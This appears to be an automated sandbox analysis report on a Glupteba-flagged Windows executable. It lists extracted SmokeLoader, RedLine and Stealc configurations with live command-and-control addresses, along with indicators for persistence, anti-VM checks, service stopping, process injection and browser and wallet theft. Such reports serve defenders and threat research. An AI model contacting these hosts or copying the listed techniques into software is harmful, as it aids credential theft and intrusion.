glupteba | 57c0272d464fe604ca3b900d91e98b925f3745fcdc51858b01ee59a8eaa79166

Analysis

max time kernel
154s
max time network
176s
platform
windows10-2004_x64
resource
win10v2004-20231025-en
resource tags

arch:x64arch:x86image:win10v2004-20231025-enlocale:en-usos:windows10-2004-x64system
submitted
12/11/2023, 09:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

57c0272d464fe604ca3b900d91e98b925f3745fcdc51858b01ee59a8eaa79166.exe
Size

1.4MB
MD5

cae783bde737401911ece8332218fc58
SHA1

c3b1bf3bb813c4a7dcae0fa4b448b83ed3513385
SHA256

57c0272d464fe604ca3b900d91e98b925f3745fcdc51858b01ee59a8eaa79166
SHA512

1144b529d63d3f1d833f530b776596ce6b7517b1f257ef3c0b0027a2b83a1f144694ee879b6479c952e92a1f1607d77106042585253d29d4d9cdf466e7db8328
SSDEEP

24576:dyWbVx90WbgHpJ6FuRebIsvJEGWYTDoWnJ+UdwE3E1JOwcQRG4u5l5B3ngXz:44WWb0+ceUKeGrpldeLROt+

Malware Config

Extracted

Family

smokeloader

Version

2022

http://5.42.92.190/fks/index.php

rc4.i32

Extracted

Family

redline

Botnet

taiga

5.42.92.51:19057

Extracted

Family

stealc

http://77.91.68.247

Attributes

url_path
/c36258786fdc16da.php

rc4.plain

Extracted

Family

smokeloader

Botnet

up3

Signatures

Detect Mystic stealer payload 4 IoCs

resource	yara_rule
behavioral1/memory/6128-311-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/6128-312-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/6128-314-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family
behavioral1/memory/6128-317-0x0000000000400000-0x0000000000433000-memory.dmp	mystic_family

Detect ZGRat V1 25 IoCs

resource	yara_rule
behavioral1/memory/5448-699-0x00000287A39E0000-0x00000287A3AC4000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-712-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-710-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-720-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-724-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-727-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-730-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-732-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-734-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-736-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-747-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-751-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-753-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-755-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-757-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-759-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-761-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-763-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-765-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-767-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-774-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-776-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-778-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/5448-780-0x00000287A39E0000-0x00000287A3AC0000-memory.dmp	family_zgrat_v1
behavioral1/memory/332-944-0x00000000029B0000-0x0000000002DB6000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 4 IoCs

resource	yara_rule
behavioral1/memory/332-951-0x0000000002DC0000-0x00000000036AB000-memory.dmp	family_glupteba
behavioral1/memory/332-966-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/332-3126-0x0000000002DC0000-0x00000000036AB000-memory.dmp	family_glupteba
behavioral1/memory/332-3191-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Mystic
Mystic is an infostealer written in C++.
stealer mystic
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

resource	yara_rule
behavioral1/memory/6104-430-0x0000000000400000-0x000000000043C000-memory.dmp	family_redline
behavioral1/memory/5460-551-0x0000000000400000-0x000000000046F000-memory.dmp	family_redline
behavioral1/memory/5460-552-0x0000000000470000-0x00000000004CA000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Stealc
Stealc is an infostealer written in C++.
stealer stealc

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

description	pid	Process	procid_target
PID 6796 created 3292	6796	latestX.exe	24
PID 6796 created 3292	6796	latestX.exe	24
PID 6796 created 3292	6796	latestX.exe	24
PID 6796 created 3292	6796	latestX.exe	24
PID 6796 created 3292	6796	latestX.exe	24
PID 3692 created 3292	3692	updater.exe	24

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\drivers\etc\hosts	latestX.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Windows Service

T1543.003

pid	Process
2180	netsh.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	59E4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	2E8D.exe

Executes dropped EXE 27 IoCs

pid	Process
2548	vi3kz20.exe
4548	jH7gp62.exe
4608	BE8Ik00.exe
3532	1Vt03Av8.exe
6360	2Ea8934.exe
5592	7AJ62YN.exe
3720	8eJ829Hk.exe
4516	9jY6li4.exe
5460	2E8D.exe
3388	59E4.exe
6924	6D3E.exe
4708	InstallSetup5.exe
6804	toolspub2.exe
5448	6D3E.exe
4636	Broom.exe
332	31839b57a4f11171d6abc8bbc4451ee4.exe
5604	forc.exe
6796	latestX.exe
2408	toolspub2.exe
6820	D724.exe
3692	updater.exe
6624	31839b57a4f11171d6abc8bbc4451ee4.exe
5992	6E74.exe
6852	AB4F.exe
5688	B080.exe
2548	_NewEnum.exe
6140	_NewEnum.exe

Loads dropped DLL 2 IoCs

pid	Process
5604	forc.exe
5604	forc.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	57c0272d464fe604ca3b900d91e98b925f3745fcdc51858b01ee59a8eaa79166.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	vi3kz20.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	jH7gp62.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	BE8Ik00.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0008000000022e13-26.dat	autoit_exe
behavioral1/files/0x0008000000022e13-27.dat	autoit_exe

Detected potential entity reuse from brand paypal.
phishing paypal

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 6360 set thread context of 6128	6360	2Ea8934.exe	148
PID 3720 set thread context of 6104	3720	8eJ829Hk.exe	162
PID 4516 set thread context of 4996	4516	9jY6li4.exe	168
PID 6924 set thread context of 5448	6924	6D3E.exe	182
PID 6804 set thread context of 2408	6804	toolspub2.exe	186
PID 6820 set thread context of 3964	6820	D724.exe	220
PID 2548 set thread context of 6140	2548	_NewEnum.exe	245

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\updater.exe	latestX.exe

Launches sc.exe 10 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
7048	sc.exe
6512	sc.exe
5416	sc.exe
5288	sc.exe
3104	sc.exe
6268	sc.exe
6068	sc.exe
3112	sc.exe
6652	sc.exe
1756	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
5752	6128	WerFault.exe	148

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7AJ62YN.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7AJ62YN.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7AJ62YN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	forc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	forc.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2751 = "Tomsk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2452 = "Saint Pierre Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5340	msedge.exe
5340	msedge.exe
5328	msedge.exe
5328	msedge.exe
5512	msedge.exe
5512	msedge.exe
5612	msedge.exe
5612	msedge.exe
5760	msedge.exe
5760	msedge.exe
4212	msedge.exe
4212	msedge.exe
6356	msedge.exe
6356	msedge.exe
6348	msedge.exe
6348	msedge.exe
6308	msedge.exe
6308	msedge.exe
5592	7AJ62YN.exe
5592	7AJ62YN.exe
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE
3292	Explorer.EXE

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
5592	7AJ62YN.exe
2408	toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 27 IoCs

pid	Process
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4212	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe
4608	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeDebugPrivilege	6924	6D3E.exe
Token: SeDebugPrivilege	5460	2E8D.exe
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeDebugPrivilege	7068	powershell.exe
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeShutdownPrivilege	3292	Explorer.EXE
Token: SeCreatePagefilePrivilege	3292	Explorer.EXE
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeShutdownPrivilege	5068	powercfg.exe
Token: SeCreatePagefilePrivilege	5068	powercfg.exe
Token: SeShutdownPrivilege	5868	powercfg.exe
Token: SeCreatePagefilePrivilege	5868	powercfg.exe
Token: SeShutdownPrivilege	2440	powercfg.exe
Token: SeCreatePagefilePrivilege	2440	powercfg.exe
Token: SeShutdownPrivilege	3124	powercfg.exe
Token: SeCreatePagefilePrivilege	3124	powercfg.exe
Token: SeIncreaseQuotaPrivilege	4504	powershell.exe
Token: SeSecurityPrivilege	4504	powershell.exe
